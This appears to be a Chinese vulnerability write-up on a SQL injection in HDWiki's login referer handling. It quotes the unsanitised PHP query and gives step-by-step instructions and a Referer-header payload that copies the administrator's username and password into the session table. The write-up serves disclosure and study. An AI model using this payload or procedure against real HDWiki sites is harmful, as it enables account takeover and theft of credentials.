作者：thanks 博客：http://hi.baidu.com/thanks4sec

HDWIKI官方网站：http://kaiyuan.hudong.com/

影响版本：HDWIKI所有

 

-----------------------------------

 

找了半天没找到回显，觉得鸡肋所以发了

有想到好的利用方法同学记得告诉我声~

model/user.class.php：

function add_referer(){

              if($_SERVER['HTTP_REFERER']){

                     $this->db->query("UPDATE".DB_TABLEPRE."session SET referer='".$_SERVER['HTTP_REFERER']."' WHERE sid='".base::hgetcookie('sid')."'");

              }//问题再此

       }

       functionget_referer(){

              $session=$this->db->fetch_first("SELECTreferer FROM ".DB_TABLEPRE."session WHERE sid='".base::hgetcookie('sid')."'");

              if($session['referer']==""){

                     $session['referer']="index.php";

              }else{

                     if(strpos($session['referer'],'admin_')!==false){

                            $session['referer']="index.php?admin_main";

                     }

              }

              return$session['referer'];

       }

 

 

 

回溯到www.2cto.com control/user.php

function dologin(){

              $_ENV['user']->passport_server('login','1');

              if(!isset($this->post['submit'])){ //submit为null进入

                     $this->view->assign('checkcode',isset($this->setting['checkcode'])?$this->setting['checkcode']:0);

 

                     $_ENV['user']->add_referer();//登录时注入形成

                     $_ENV['user']->passport_server('login','2');

                     $_ENV['user']->passport_client('login');

 

                     if(!isset($this->setting['name_min_length'])){$this->setting['name_min_length'] = 3;}

                     if(!isset($this->setting['name_max_length'])){$this->setting['name_max_length'] = 15;}

                     $loginTip2= str_replace(array('3','15'),array($this->setting['name_min_length'],$this->setting['name_max_length']),$this->view->lang['loginTip2']);

                     $this->view->assign('name_min_length',$this->setting['name_min_length']);

                     $this->view->assign('name_max_length',$this->setting['name_max_length']);

                     $this->view->assign('loginTip2',$loginTip2);

                     //$this->view->display('login');

                     $_ENV['block']->view('login');

              }else{

 

……以下代码省略

 

详细说明：

1、抓登陆包

2、随便建个用户登陆

3、修改包，post内容只保留username和password就好，其他的删掉。

  如username=test&password=test

4、使用burpsuite或者nc，修改包头referer，如改为：

  admin_',username=(SELECT concat(username,0x2f,password) FROM wiki_user where uid=1)#

提交后即将管理员账号、密码赋值于wiki_session表的username字段。

  因此调用wiki_session.username变量的页面会爆出账号密码（管理员和普通用户同在wiki_user表中）。

 

注：但是没有找到username或者hdwiki_session表字段回显的地方，鸡肋在此